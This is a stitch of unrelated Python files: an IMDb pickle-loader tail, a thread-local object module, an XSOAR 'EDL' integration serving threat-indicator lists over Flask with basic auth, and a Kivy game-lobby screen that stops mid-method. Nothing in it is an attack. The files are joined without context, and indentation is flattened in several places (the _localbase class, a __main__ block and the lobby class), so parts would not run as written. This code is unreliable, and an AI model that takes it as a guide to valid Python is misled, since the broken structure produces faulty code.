    id2genre_dic = _load('_id2genre_dic.pkl')
    id2l_director_dic = _load('_id2director_dic.pkl')
    id2l_principal_dic = _load('_id2_principal_dic.pkl')
    id2l_writer_dic = _load('_id2writer_dic.pkl')
    people_id2name_dic = _load('_people_id2name_dic.pkl')
    print("IMDb dics loaded ...")
    return titles2id_dic, titles2year_dic, id2info_dic, id2genre_dic, \
        id2l_director_dic, id2l_writer_dic, id2l_principal_dic, people_id2name_dic
def load_imdb_small_subset_dics():
    """Load the '_small' pickled subset of the IMDb dictionaries."""
    def _load(fname):
        with open(os.path.join(IMDB_DIR, fname), 'rb') as f:
            return pickle.load(f)
    id2numer_info_dic = _load('_id2numer_info_dic_small.pkl')
    id2str_info_dic = _load('_id2str_info_dic_small.pkl')
    id2genre_dic = _load('_id2genre_dic_small.pkl')
    id2l_director_dic = _load('_id2l_director_dic_small.pkl')
    id2l_principal_dic = _load('_id2l_principal_dic_small.pkl')
    id2l_writer_dic = _load('_id2l_writer_dic_small.pkl')
    people_id2name_dic = _load('_people_id2name_dic_small.pkl')
    people_id2primaryProfession = _load('_people_id2primaryProfession_small.pkl')
    print("IMDb dics loaded ...")
    return id2numer_info_dic, id2str_info_dic, id2genre_dic, id2l_director_dic, id2l_writer_dic, \
        id2l_principal_dic, people_id2name_dic, people_id2primaryProfession
def load_imdb_subset_dics():
    """Load the pickled subset dictionaries produced by read_subset_imdb2dic()."""
    def _load(fname):
        with open(os.path.join(IMDB_DIR, fname), 'rb') as f:
            return pickle.load(f)
    id2numer_info_dic = _load('_id2numer_info_dic.pkl')
    id2str_info_dic = _load('_id2str_info_dic.pkl')
    id2genre_dic = _load('_id2genre_dic.pkl')
    id2l_director_dic = _load('_id2director_dic.pkl')
    id2l_principal_dic = _load('_id2_principal_dic.pkl')
    id2l_writer_dic = _load('_id2writer_dic.pkl')
    people_id2name_dic = _load('_people_id2name_dic.pkl')
    people_id2primaryProfession = _load('_people_id2primaryProfession.pkl')
    print("IMDb dics loaded ...")
    return id2numer_info_dic, id2str_info_dic, id2genre_dic, id2l_director_dic, id2l_writer_dic, \
        id2l_principal_dic, people_id2name_dic, people_id2primaryProfession
if __name__ == '__main__':
print("==================================================")
#load_imdb_subset_dics()
#titles2id_dic, titles2year_dic, id2info_dic, id2genre_dic,\
#id2l_director_dic, id2l_writer_dic, id2l_principal_dic,people_id2name_dic = read_imdb2dic()
id2numer_info_dic, id2str_info_dic, id2genre_dic, id2l_director_dic, id2l_writer_dic, \
id2l_principal_dic, people_id2name_dic, people_id2primaryProfession = read_subset_imdb2dic() |
_threading_local.py | """Thread-local objects.
(Note that this module provides a Python version of the threading.local
class. Depending on the version of Python you're using, there may be a
faster one available. You should always import the `local` class from
`threading`.)
Thread-local objects support the management of thread-local data.
If you have data that you want to be local to a thread, simply create
a thread-local object and use its attributes:
>>> mydata = local()
>>> mydata.number = 42
>>> mydata.number
42
You can also access the local-object's dictionary:
>>> mydata.__dict__
{'number': 42}
>>> mydata.__dict__.setdefault('widgets', [])
[]
>>> mydata.widgets
[]
What's important about thread-local objects is that their data are
local to a thread. If we access the data in a different thread:
>>> log = []
>>> def f():
... items = mydata.__dict__.items()
... items.sort()
... log.append(items)
... mydata.number = 11
... log.append(mydata.number)
>>> import threading
>>> thread = threading.Thread(target=f)
>>> thread.start()
>>> thread.join()
>>> log
[[], 11]
we get different data. Furthermore, changes made in the other thread
don't affect data seen in this thread:
>>> mydata.number
42
Of course, values you get from a local object, including a __dict__
attribute, are for whatever thread was current at the time the
attribute was read. For that reason, you generally don't want to save
these values across threads, as they apply only to the thread they
came from.
You can create custom local objects by subclassing the local class:
>>> class MyLocal(local):
... number = 2
... initialized = False
... def __init__(self, **kw):
... if self.initialized:
... raise SystemError('__init__ called too many times')
... self.initialized = True
... self.__dict__.update(kw)
... def squared(self):
... return self.number ** 2
This can be useful to support default values, methods and
initialization. Note that if you define an __init__ method, it will be
called each time the local object is used in a separate thread. This
is necessary to initialize each thread's dictionary.
Now if we create a local object:
>>> mydata = MyLocal(color='red')
Now we have a default number:
>>> mydata.number
2
an initial color:
>>> mydata.color
'red'
>>> del mydata.color
And a method that operates on the data:
>>> mydata.squared()
4
As before, we can access the data in a separate thread:
>>> log = []
>>> thread = threading.Thread(target=f)
>>> thread.start()
>>> thread.join()
>>> log
[[('color', 'red'), ('initialized', True)], 11]
without affecting this thread's data:
>>> mydata.number
2
>>> mydata.color
Traceback (most recent call last):
...
AttributeError: 'MyLocal' object has no attribute 'color'
Note that subclasses can define slots, but they are not thread
local. They are shared across threads:
>>> class MyLocal(local):
... __slots__ = 'number'
>>> mydata = MyLocal()
>>> mydata.number = 42
>>> mydata.color = 'red'
So, the separate thread:
>>> thread = threading.Thread(target=f)
>>> thread.start()
>>> thread.join()
affects what we see:
>>> mydata.number
11
>>> del mydata
"""
__all__ = ["local"]
# We need to use objects from the threading module, but the threading
# module may also want to use our `local` class, if support for locals
# isn't compiled in to the `thread` module. This creates potential problems
# with circular imports. For that reason, we don't import `threading`
# until the bottom of this file (a hack sufficient to worm around the
# potential problems). Note that almost all platforms do have support for
# locals in the `thread` module, and there is no circular import problem
# then, so problems introduced by fiddling the order of imports here won't
# manifest on most boxes.
class _localbase(object):
__slots__ = '_local__key', '_local__args', '_local__lock'
def __new__(cls, *args, **kw):
self = object.__new__(cls)
key = '_local__key', 'thread.local.' + str(id(self))
object.__setattr__(self, '_local__key', key)
object.__setattr__(self, '_local__args', (args, kw))
object.__setattr__(self, '_local__lock', RLock())
if args or kw and (cls.__init__ is object.__init__):
raise TypeError("Initialization arguments are not supported")
# We need to create the thread dict in anticipation of
# __init__ being called, to make sure we don't call it
# again ourselves.
dict = object.__getattribute__(self, '__dict__')
current_thread().__dict__[key] = dict
return self
def _patch(self):
    # Bind the calling thread's private dict to self.__dict__, creating it
    # (and running the subclass __init__, if any) on first use in a thread.
    key = object.__getattribute__(self, '_local__key')
    d = current_thread().__dict__.get(key)
    if d is None:
        # First access from this thread: create a fresh per-thread dict.
        d = {}
        current_thread().__dict__[key] = d
        object.__setattr__(self, '__dict__', d)
        # we have a new instance dict, so call out __init__ if we have
        # one
        cls = type(self)
        if cls.__init__ is not object.__init__:
            args, kw = object.__getattribute__(self, '_local__args')
            cls.__init__(self, *args, **kw)
    else:
        # Subsequent access from this thread: just swap the dict back in.
        object.__setattr__(self, '__dict__', d)
class local(_localbase):
    """Thread-local namespace object.

    Every attribute access routes through _patch(), which swaps this
    thread's private dict into self.__dict__ before delegating to the
    default object machinery. The three accessors serialize on the
    per-instance RLock because _patch() mutates self.__dict__.
    """
    def __getattribute__(self, name):
        lock = object.__getattribute__(self, '_local__lock')
        lock.acquire()
        try:
            # Bind this thread's dict before reading the attribute.
            _patch(self)
            return object.__getattribute__(self, name)
        finally:
            lock.release()

    def __setattr__(self, name, value):
        lock = object.__getattribute__(self, '_local__lock')
        lock.acquire()
        try:
            # Bind this thread's dict before writing the attribute.
            _patch(self)
            return object.__setattr__(self, name, value)
        finally:
            lock.release()

    def __delattr__(self, name):
        lock = object.__getattribute__(self, '_local__lock')
        lock.acquire()
        try:
            # Bind this thread's dict before deleting the attribute.
            _patch(self)
            return object.__delattr__(self, name)
        finally:
            lock.release()

    def __del__(self):
        # Remove this instance's per-thread dicts from every live thread so
        # the data does not outlive the local object.
        import threading
        key = object.__getattribute__(self, '_local__key')
        try:
            threads = list(threading.enumerate())
        except:
            # If enumerate fails, as it seems to do during
            # shutdown, we'll skip cleanup under the assumption
            # that there is nothing to clean up.
            return
        for thread in threads:
            try:
                __dict__ = thread.__dict__
            except AttributeError:
                # Thread is dying, rest in peace.
                continue
            if key in __dict__:
                try:
                    del __dict__[key]
                except KeyError:
                    pass # didn't have anything in this thread
from threading import current_thread, RLock
|
EDL.py | import demistomock as demisto
from CommonServerPython import *
from CommonServerUserPython import *
from flask import Flask, Response, request
from gevent.pywsgi import WSGIServer
from tempfile import NamedTemporaryFile
from typing import Callable, List, Any, Dict, cast
from base64 import b64decode
from copy import deepcopy
import re
from ssl import SSLContext, SSLError, PROTOCOL_TLSv1_2
from multiprocessing import Process
class Handler:
    """File-like shim: anything written to it is forwarded to demisto.info,
    so server/log objects expecting a writable stream log into the
    integration's log instead."""
    @staticmethod
    def write(msg):
        demisto.info(msg)
''' GLOBAL VARIABLES '''
INTEGRATION_NAME: str = 'EDL'
PAGE_SIZE: int = 200
DEMISTO_LOGGER: Handler = Handler()
APP: Flask = Flask('demisto-edl')
EDL_VALUES_KEY: str = 'dmst_edl_values'
EDL_LIMIT_ERR_MSG: str = 'Please provide a valid integer for EDL Size'
EDL_MISSING_REFRESH_ERR_MSG: str = 'Refresh Rate must be "number date_range_unit", examples: (2 hours, 4 minutes, ' \
'6 months, 1 day, etc.)'
''' REFORMATTING REGEXES '''
_PROTOCOL_RE = re.compile('^(?:[a-z]+:)*//')
_PORT_RE = re.compile(r'^((?:[a-z]+:)*//([a-z0-9\-\.]+)|([a-z0-9\-\.]+))(?:\:[0-9]+)*')
_URL_WITHOUT_PORT = r'\g<1>'
_INVALID_TOKEN_RE = re.compile(r'(?:[^\./+=\?&]+\*[^\./+=\?&]*)|(?:[^\./+=\?&]*\*[^\./+=\?&]+)')
''' HELPER FUNCTIONS '''
def list_to_str(inp_list: list, delimiter: str = ',', map_func: Callable = str) -> str:
    """
    Transforms a list to an str, with a custom delimiter between each list item
    """
    # Any falsy input (None, [], '', ...) yields an empty string.
    if not inp_list:
        return ""
    if not isinstance(inp_list, list):
        raise AttributeError('Invalid inp_list provided to list_to_str')
    return delimiter.join(map_func(item) for item in inp_list)
def get_params_port(params: dict = None) -> int:
    """
    Gets the listen port from the integration parameters.

    :param params: integration params; when omitted, demisto.params() is read
        at call time.
    :return: the configured port as an int
    :raises ValueError: if no port was configured
    :raises DemistoException: if the configured port is not an integer

    Note: the original signature used ``params: dict = demisto.params()``,
    which is evaluated once at import time (stale params, import-time side
    effect). The default is now resolved lazily.
    """
    if params is None:
        params = demisto.params()
    port_mapping: str = params.get('longRunningPort', '')
    if not port_mapping:
        raise ValueError('Please provide a Listen Port.')
    err_msg = f'Listen Port must be an integer. {port_mapping} is not valid.'
    if ':' in port_mapping:
        # "host:port" style mapping - only the port part matters here
        return try_parse_integer(port_mapping.split(':')[1], err_msg)
    return try_parse_integer(port_mapping, err_msg)
def refresh_edl_context(indicator_query: str, limit: int = 0,
                        panos_compatible: bool = True, url_port_stripping: bool = True) -> str:
    """
    Refresh the cached EDL values by querying demisto.searchIndicators.

    Parameters:
        indicator_query (str): Query that determines which indicators to include in
            the EDL (Cortex XSOAR indicator query syntax)
        limit (int): The maximum number of indicators to include in the EDL
        panos_compatible (bool): Whether to make the indicators PANOS compatible or not
        url_port_stripping (bool): Whether to strip the port from URL indicators (if a port is present) or not

    Returns:
        str: newline-joined indicator values (also persisted to the integration context)
    """
    now = datetime.now()
    # poll indicators into edl from demisto
    iocs = find_indicators_to_limit(indicator_query, limit, panos_compatible, url_port_stripping)
    out_dict = create_values_out_dict(iocs)
    # persist both the values and the refresh timestamp before returning
    save_context(now, out_dict)
    return out_dict[EDL_VALUES_KEY]
def save_context(now: datetime, out_dict: dict):
    """Saves the EDL values to the integration context and records the refresh
    time in last-run (used later for cache-expiry checks)."""
    demisto.setLastRun({'last_run': date_to_timestamp(now)})
    demisto.setIntegrationContext(out_dict)
def find_indicators_to_limit(indicator_query: str, limit: int,
                             panos_compatible: bool = True, url_port_stripping: bool = False) -> list:
    """
    Finds indicators using demisto.searchIndicators

    Parameters:
        indicator_query (str): Query that determines which indicators to include in
            the EDL (Cortex XSOAR indicator query syntax)
        limit (int): The maximum number of indicators to include in the EDL
        panos_compatible (bool): Whether to make the indicators PANOS compatible or not
        url_port_stripping (bool): Whether to strip the port from URL indicators (if a port is present) or not

    Returns:
        list: The IoCs list up until the amount set by 'limit'
    """
    iocs, _ = find_indicators_to_limit_loop(indicator_query, limit,
                                            panos_compatible=panos_compatible,
                                            url_port_stripping=url_port_stripping)
    # the loop may overshoot `limit` by up to one page (plus PAN-OS duplicates)
    return iocs[:limit]
def find_indicators_to_limit_loop(indicator_query: str, limit: int, total_fetched: int = 0,
                                  next_page: int = 0, last_found_len: int = PAGE_SIZE,
                                  panos_compatible: bool = True, url_port_stripping: bool = False):
    """
    Finds indicators using a while loop with demisto.searchIndicators, and returns the result and last page

    Parameters:
        indicator_query (str): Query that determines which indicators to include in
            the EDL (Cortex XSOAR indicator query syntax)
        limit (int): The maximum number of indicators to include in the EDL
        total_fetched (int): The amount of indicators already fetched
        next_page (int): The page we are up to in the loop
        last_found_len (int): The amount of indicators found in the last fetch
        panos_compatible (bool): Whether to make the indicators PANOS compatible or not
        url_port_stripping (bool): Whether to strip the port from URL indicators (if a port is present) or not

    Returns:
        (tuple): The iocs and the last page
    """
    iocs: List[dict] = []
    if not last_found_len:
        last_found_len = total_fetched
    # a short page means the previous fetch exhausted the results
    while last_found_len == PAGE_SIZE and limit and total_fetched < limit:
        formatted_iocs = []
        fetched_iocs = demisto.searchIndicators(query=indicator_query, page=next_page, size=PAGE_SIZE).get('iocs', [])
        if panos_compatible or url_port_stripping:
            for ioc in fetched_iocs:
                ioc_value = ioc.get('value', '')
                if url_port_stripping:
                    ioc_value = _PORT_RE.sub(_URL_WITHOUT_PORT, ioc_value)
                if panos_compatible:
                    # protocol stripping
                    ioc_value = _PROTOCOL_RE.sub('', ioc_value)
                    # mix of text and wildcard in domain field handling
                    ioc_value = _INVALID_TOKEN_RE.sub('*', ioc_value)
                    # for PAN-OS *.domain.com does not match domain.com
                    # we should provide both
                    # this could generate more than num entries according to PAGE_SIZE
                    if ioc_value.startswith('*.'):
                        ioc_object_copy = deepcopy(ioc)
                        # BUGFIX: lstrip('*.') strips a *set* of characters, not
                        # the '*.' prefix (it mangled values like '*.*.example.com');
                        # slice off exactly the leading '*.' instead.
                        ioc_object_copy['value'] = ioc_value[2:]
                        formatted_iocs.append(ioc_object_copy)
                ioc['value'] = ioc_value
                formatted_iocs.append(ioc)
            iocs.extend(formatted_iocs)
        else:
            iocs.extend(fetched_iocs)
        last_found_len = len(fetched_iocs)
        total_fetched += last_found_len
        next_page += 1
    return iocs, next_page
def create_values_out_dict(iocs: list) -> dict:
    """Build the integration-context payload: every non-empty indicator value,
    one per line, stored under EDL_VALUES_KEY."""
    values = [ioc.get('value') for ioc in iocs if ioc.get('value')]
    return {EDL_VALUES_KEY: '\n'.join(str(value) for value in values)}
def get_edl_ioc_values(on_demand, limit, indicator_query='', last_run=None, cache_refresh_rate=None,
                       panos_compatible: bool = True, url_port_stripping: bool = False) -> str:
    """Return the EDL body: cached values when the cache is fresh (or when
    on-demand mode is on), otherwise a freshly refreshed list."""
    # on_demand ignores the cache-expiry logic entirely
    if on_demand:
        return get_ioc_values_str_from_context()
    if last_run:
        cache_time, _ = parse_date_range(cache_refresh_rate, to_timestamp=True)
        if last_run > cache_time:
            # cache is still fresh
            return get_ioc_values_str_from_context()
    # no previous run, or the cache has expired - rebuild it
    return refresh_edl_context(indicator_query, limit=limit,
                               panos_compatible=panos_compatible,
                               url_port_stripping=url_port_stripping)
def get_ioc_values_str_from_context() -> str:
    """Extracts the cached EDL body from the integration context; empty string
    if nothing has been cached yet."""
    cache_dict = demisto.getIntegrationContext()
    return cache_dict.get(EDL_VALUES_KEY, '')
def try_parse_integer(int_to_parse: Any, err_msg: str) -> int:
    """Parse *int_to_parse* as an int; on failure raise DemistoException
    carrying *err_msg*."""
    try:
        return int(int_to_parse)
    except (TypeError, ValueError):
        raise DemistoException(err_msg)
def validate_basic_authentication(headers: dict, username: str, password: str) -> bool:
    """
    Checks whether the authentication is valid.

    :param headers: The headers of the http request
    :param username: The integration's username
    :param password: The integration's password
    :return: Boolean which indicates whether the authentication is valid or not

    Fixes over the original:
    - passwords containing ':' were always rejected (split(':') + length check);
      now split on the first ':' only, per RFC 7617.
    - malformed base64 raised an uncaught binascii/Unicode error into the
      request handler; now treated as failed authentication.
    - the header must actually start with 'Basic ' instead of merely containing it.
    """
    auth_header: str = headers.get('Authorization', '')
    if not auth_header or not auth_header.startswith('Basic '):
        return False
    encoded_credentials: str = auth_header[len('Basic '):]
    try:
        credentials: str = b64decode(encoded_credentials).decode('utf-8')
    except Exception:
        # invalid base64 / non-utf8 payload - not authenticated, never a crash
        return False
    if ':' not in credentials:
        return False
    # split only on the first ':' so passwords containing ':' work
    user, pwd = credentials.split(':', 1)
    return user == username and pwd == password
''' ROUTE FUNCTIONS '''


@APP.route('/', methods=['GET'])
def route_edl_values() -> Response:
    """Main Flask handler: enforce optional basic auth, then serve the EDL
    values (cached or refreshed) as text/plain."""
    params = demisto.params()
    credentials = params.get('credentials') or {}
    username: str = credentials.get('identifier', '')
    password: str = credentials.get('password', '')
    if username and password:
        request_headers = cast(Dict[Any, Any], request.headers)
        if not validate_basic_authentication(request_headers, username, password):
            auth_error: str = 'Basic authentication failed. Make sure you are using the right credentials.'
            demisto.debug(auth_error)
            return Response(auth_error, status=401)
    values = get_edl_ioc_values(
        on_demand=params.get('on_demand'),
        limit=try_parse_integer(params.get('edl_size'), EDL_LIMIT_ERR_MSG),
        last_run=demisto.getLastRun().get('last_run'),
        indicator_query=params.get('indicators_query'),
        cache_refresh_rate=params.get('cache_refresh_rate'),
        panos_compatible=params.get('panos_compatible', False),
        url_port_stripping=params.get('url_port_stripping', False),
    )
    return Response(values, status=200, mimetype='text/plain')
''' COMMAND FUNCTIONS '''


def test_module(args, params):
    """
    Validates:
    1. Valid port.
    2. Valid cache_refresh_rate
    """
    get_params_port(params)
    if not params.get('on_demand', None):
        # without on-demand mode, size/query/refresh-rate must all be valid
        try_parse_integer(params.get('edl_size'), EDL_LIMIT_ERR_MSG)  # validate EDL Size was set
        if not params.get('indicators_query'):  # validate indicators_query isn't empty
            raise ValueError('"Indicator Query" is required. Provide a valid query.')
        cache_refresh_rate = params.get('cache_refresh_rate', '')
        if not cache_refresh_rate:
            raise ValueError(EDL_MISSING_REFRESH_ERR_MSG)
        # validate cache_refresh_rate is of the form "<number> <unit>"
        range_split = cache_refresh_rate.split(' ')
        if len(range_split) != 2:
            raise ValueError(EDL_MISSING_REFRESH_ERR_MSG)
        try_parse_integer(range_split[0], 'Invalid time value for the Refresh Rate. Must be a valid integer.')
        valid_units = ('minute', 'minutes', 'hour', 'hours', 'day', 'days',
                       'month', 'months', 'year', 'years')
        if range_split[1] not in valid_units:
            raise ValueError(
                'Invalid time unit for the Refresh Rate. Must be minutes, hours, days, months, or years.')
        parse_date_range(cache_refresh_rate, to_timestamp=True)
    run_long_running(params, is_test=True)
    return 'ok', {}, {}
def run_long_running(params, is_test=False):
    """
    Start the long running server

    :param params: Demisto params
    :param is_test: Indicates whether it's test-module run or regular run
    :return: None
    :raises ValueError: on SSL failures or any server error (original exception
        is logged via demisto.error first)
    """
    certificate: str = params.get('certificate', '')
    private_key: str = params.get('key', '')
    certificate_path = str()
    private_key_path = str()
    try:
        port = get_params_port(params)
        ssl_args = dict()
        # HTTPS requires both halves of the key pair
        if (certificate and not private_key) or (private_key and not certificate):
            raise DemistoException('If using HTTPS connection, both certificate and private key should be provided.')
        if certificate and private_key:
            # gevent needs real files for the cert chain, so write the PEM
            # params to temp files (cleaned up in `finally`)
            certificate_file = NamedTemporaryFile(delete=False)
            certificate_path = certificate_file.name
            certificate_file.write(bytes(certificate, 'utf-8'))
            certificate_file.close()

            private_key_file = NamedTemporaryFile(delete=False)
            private_key_path = private_key_file.name
            private_key_file.write(bytes(private_key, 'utf-8'))
            private_key_file.close()

            context = SSLContext(PROTOCOL_TLSv1_2)
            context.load_cert_chain(certificate_path, private_key_path)
            ssl_args['ssl_context'] = context
            demisto.debug('Starting HTTPS Server')
        else:
            demisto.debug('Starting HTTP Server')
        server = WSGIServer(('', port), APP, **ssl_args, log=DEMISTO_LOGGER)
        if is_test:
            # for test-module: run briefly in a child process, then kill it
            server_process = Process(target=server.serve_forever)
            server_process.start()
            time.sleep(5)
            server_process.terminate()
        else:
            server.serve_forever()
    except SSLError as e:
        ssl_err_message = f'Failed to validate certificate and/or private key: {str(e)}'
        demisto.error(ssl_err_message)
        raise ValueError(ssl_err_message)
    except Exception as e:
        demisto.error(f'An error occurred in long running loop: {str(e)}')
        raise ValueError(str(e))
    finally:
        # always remove the temp PEM files, even on failure
        if certificate_path:
            os.unlink(certificate_path)
        if private_key_path:
            os.unlink(private_key_path)
def update_edl_command(args, params):
    """
    Updates the EDL values and format on demand (the `edl-update` command).

    :param args: command args - may override 'edl_size', supplies 'query' and
        'print_indicators'
    :param params: integration params (used for the on_demand flag and the
        edl_size fallback)
    :return: (human readable, outputs, raw response) tuple for return_outputs
    :raises DemistoException: when on-demand mode is disabled

    Fix: use the `params` argument main() already passes instead of
    re-fetching demisto.params().
    """
    on_demand = params.get('on_demand')
    if not on_demand:
        raise DemistoException(
            '"Update EDL On Demand" is off. If you want to update the EDL manually please toggle it on.')
    limit = try_parse_integer(args.get('edl_size', params.get('edl_size')), EDL_LIMIT_ERR_MSG)
    print_indicators = args.get('print_indicators')
    query = args.get('query')
    indicators = refresh_edl_context(query, limit=limit)
    hr = tableToMarkdown('EDL was updated successfully with the following values', indicators,
                         ['Indicators']) if print_indicators == 'true' else 'EDL was updated successfully'
    return hr, {}, indicators
def main():
    """Validate credential params, then dispatch the invoked command."""
    params = demisto.params()
    credentials = params.get('credentials') or {}
    username: str = credentials.get('identifier', '')
    password: str = credentials.get('password', '')
    # credentials are all-or-nothing
    if (username and not password) or (password and not username):
        err_msg: str = 'If using credentials, both username and password should be provided.'
        demisto.debug(err_msg)
        raise DemistoException(err_msg)

    command = demisto.command()
    demisto.debug('Command being called is {}'.format(command))
    commands = {
        'test-module': test_module,
        'edl-update': update_edl_command,
    }
    try:
        if command == 'long-running-execution':
            run_long_running(params)
        else:
            readable_output, outputs, raw_response = commands[command](demisto.args(), params)
            return_outputs(readable_output, outputs, raw_response)
    except Exception as e:
        return_error(f'Error in {INTEGRATION_NAME} Integration [{e}]')


if __name__ in ['__main__', '__builtin__', 'builtins']:
    main()
|
lobbyscreen.py | from mbaacc import MOON
from json.decoder import JSONDecodeError
import time
import requests
import threading
import pyperclip
from functools import partial
from config import *
from kivy.properties import ObjectProperty
from kivy.uix.screenmanager import Screen
from ui.modals import *
from ui.buttons import DummyBtn, PlayerRow
import presence
import logging
from ui.playerwiki import *
class LobbyScreen(Screen):
    """Kivy screen for an online lobby: shows idle players, incoming
    challenges and running matches, and manages the polling thread."""

    active_pop = None  # active popup on the screen
    player_list = ObjectProperty(None)  # layout listing idle players
    challenge_list = ObjectProperty(None)  # layout listing incoming challenges
    match_list = ObjectProperty(None)  # layout listing running matches
    lobby_code = ObjectProperty(None)  # label displaying the lobby code
def __init__(self, CApp, **kwargs):
    """Keep a reference to the app and reset all per-lobby state."""
    super(LobbyScreen, self).__init__(**kwargs)
    self.app = CApp
    self.secret = None  # secret required for server messages
    self.lobby_thread_flag = 0  # nonzero tells the refresh thread to stop
    self.watch_player = None  # id of player to watch for spectating, TODO
    self.player_id = None  # our own ID as provided by the JSON
    self.code = None  # lobby code
    self.lobby_updater = None  # thread to manage lobby updates
    self.widget_index = {}  # player/match key -> row widget in the lobby lists
    self.error = False
    self.challenge_name = None  # name of player being challenged
    self.opponent = None  # name of player currently being played against
    self.challenge_id = None  # id of player being challenged
    self.type = None
    self.get_attempts = 0  # consecutive failed refreshes; if 2, exit
    self.alias = None  # lobby alias if any
def create(self, j, first=False, type='Private'):  # j: parsed JSON response object
    """Build or refresh the lobby UI from a server status payload.

    j: dict with keys 'msg', 'id', 'alias', 'challenges', 'idle', 'playing'.
    first: True for the initial response; also starts the auto-refresh thread.
    type: lobby visibility label ('Private'/'Public'), only used when first.
    """
    print(j)
    # This does not use self.type because it should only run once per lobby:
    # a player may start a Direct Online match separately and we do not want to
    # erase that status. self.type is used for update_stats in the Caster
    # function to signal info to the presence.
    newSound = False  # play the alert sound at most once per refresh
    if first:
        self.player_id = j['msg']
        self.code = j['id']
        if j['alias']:
            self.alias = j['alias']
            self.lobby_code.text = "[Lobby Code %s]" % self.alias
        else:
            self.lobby_code.text = "[%s Lobby Code %s]" % (type, self.code)
        self.widget_index = {}
        self.player_list.clear_widgets()
        self.match_list.clear_widgets()
        self.challenge_list.clear_widgets()
        self.type = type
        if self.app.discord is True:
            # update Discord Rich Presence with the lobby type
            if type.lower() == 'public':
                self.app.mode = 'Public Lobby'
                presence.public_lobby(self.code)
            elif type.lower() == 'private':
                self.app.mode = 'Private Lobby'
                presence.private_lobby()
            self.app.game.update_stats(once=True)
    challenging_ids = []
    # TODO: come up with a solution for players with identical names (this does not affect the server)
    if j['challenges'] != []:
        if 'c' not in self.widget_index:
            # section header row, stored under the sentinel key 'c'
            h = DummyBtn()
            h.text = 'Challenges (click to accept)'
            self.challenge_list.add_widget(h)
            self.widget_index.update({'c': h})
        for i in j['challenges']:  # i = (name, id, ip) of challenger
            challenging_ids.append(i[1])
            if i[1] in self.widget_index:
                if self.widget_index.get(i[1]).parent == self.challenge_list:
                    pass  # already shown as a challenge row
                else:  # remove their idle-player row and rebuild as a challenge row
                    self.widget_index.get(i[1]).parent.remove_widget(self.widget_index.get(i[1]))
                    p = PlayerRow()
                    p.ids['PlayerBtn'].text = i[0]
                    p.ids['PlayerBtn'].bind(on_release=partial(
                        self.accept_challenge, name=i[0], id=i[1], ip=i[2]))
                    p.ids['WatchBtn'].text = ""
                    self.challenge_list.add_widget(p)
                    self.widget_index.update({i[1]: p})
                    if newSound is False:
                        self.app.sound.play_alert()
                        newSound = True
            else:
                # brand new challenger - add a challenge row
                p = PlayerRow()
                p.ids['PlayerBtn'].text = i[0]
                p.ids['PlayerBtn'].bind(on_release=partial(
                    self.accept_challenge, name=i[0], id=i[1], ip=i[2]))
                p.ids['WatchBtn'].text = ""
                self.challenge_list.add_widget(p)
                self.widget_index.update({i[1]: p})
                if newSound is False:
                    self.app.sound.play_alert()
                    newSound = True
    else:
        # no challenges at all - drop every row still in the challenge list
        n = []
        for k, v in self.widget_index.items():
            if v in self.challenge_list.children:
                v.parent.remove_widget(v)
                n.append(k)
        for i in n:
            self.widget_index.pop(i)
    if j['idle'] != []:
        if 'i' not in self.widget_index:
            # section header row, sentinel key 'i'
            h = DummyBtn()
            h.text = 'Idle players (click to challenge)'
            self.player_list.add_widget(h)
            self.widget_index.update({'i': h})
        for i in j['idle']:
            if i[1] not in challenging_ids:  # challengers are shown above instead
                if i[1] in self.widget_index:
                    pass  # row already present
                else:
                    p = PlayerRow()
                    p.ids['PlayerBtn'].text = i[0]
                    if i[1] != self.player_id:
                        p.ids['PlayerBtn'].bind(on_release=partial(
                            self.send_challenge, name=i[0], id=i[1]))
                        if i[1] == self.watch_player:
                            p.ids['WatchBtn'].text = 'FOLLOWING'
                        else:
                            p.ids['WatchBtn'].text = 'FOLLOW'
                        p.ids['WatchBtn'].bind(on_release=partial(self.follow_player, i=i[1]))
                    else:
                        # our own row: not clickable, not followable
                        p.ids['PlayerBtn'].text += " (self)"
                        p.ids['WatchBtn'].disabled = True
                        p.ids['WatchBtn'].text = ""
                    self.player_list.add_widget(p)
                    self.widget_index.update({i[1]: p})
    else:
        # no idle players - drop every row still in the player list
        n = []
        for k, v in self.widget_index.items():
            if v in self.player_list.children:
                v.parent.remove_widget(v)
                n.append(k)
        for i in n:
            self.widget_index.pop(i)
    if j['playing'] != []:
        if 'w' not in self.widget_index:
            # section header row, sentinel key 'w'
            h = DummyBtn()
            h.text = 'Now playing (click to watch)'
            self.match_list.add_widget(h)
            self.widget_index.update({'w': h})
        for i in j['playing']:  # i = (name1, name2, id1, id2, ip)
            # a match is indexed by the unordered pair of player ids
            if (i[2], i[3]) in self.widget_index or (i[3], i[2]) in self.widget_index:
                pass
            else:
                p = PlayerRow()
                p.ids['PlayerBtn'].text = "%s vs %s" % (i[0], i[1])
                if i[2] != self.player_id and i[3] != self.player_id:
                    # can only spectate matches we are not part of
                    p.ids['PlayerBtn'].bind(on_release=partial(self.watch_match,
                                                               name="%s vs %s" % (i[0], i[1]), ip=i[4]))
                p.ids['WatchBtn'].text = ""
                self.match_list.add_widget(p)
                self.widget_index.update({(i[2], i[3]): p})
                if i[2] == self.watch_player or i[3] == self.watch_player:
                    # auto-spectate when a followed player starts a match
                    self.watch_match(name="%s vs %s" % (i[0], i[1]), ip=i[4])
    else:
        # no running matches - drop every row still in the match list
        n = []
        for k, v in self.widget_index.items():
            if v in self.match_list.children:
                v.parent.remove_widget(v)
                n.append(k)
        for i in n:
            self.widget_index.pop(i)
    # if any widgets in the index don't correspond to json items, remove them
    n = []
    for k in self.widget_index.keys():
        ok = False
        if k != 'w' and k != 'c' and k != 'i':  # keep the section headers
            for i in j['challenges']:
                if k == i[1]:
                    ok = True
            for i in j['idle']:
                if k == i[1]:
                    ok = True
            for i in j['playing']:
                if k == (i[2], i[3]) or k == (i[3], i[2]):
                    ok = True
            if ok is False:
                n.append(k)
    for i in n:
        self.widget_index.get(i).parent.remove_widget(self.widget_index.get(i))
        self.widget_index.pop(i)
    if first:
        self.app.lobby_button()
        self.lobby_thread_flag = 0
        self.lobby_updater = threading.Thread(
            target=self.auto_refresh, daemon=True)  # lobby polling watchdog
        self.lobby_updater.start()
    else:
        # update the lobby button with the pending-challenge count (minus header)
        if len(self.challenge_list.children) > 0:
            self.app.update_lobby_button('LOBBY %s (%s)' % (self.code, len(self.challenge_list.children) - 1))
        else:
            self.app.update_lobby_button('LOBBY %s ' % self.code)
def follow_player(self, obj, i):
    """Toggle following player *i*: a followed player's matches are
    auto-spectated by create(). Only one player can be followed at a time."""
    w = self.widget_index.get(i).ids['WatchBtn']
    if w.text == 'FOLLOW':
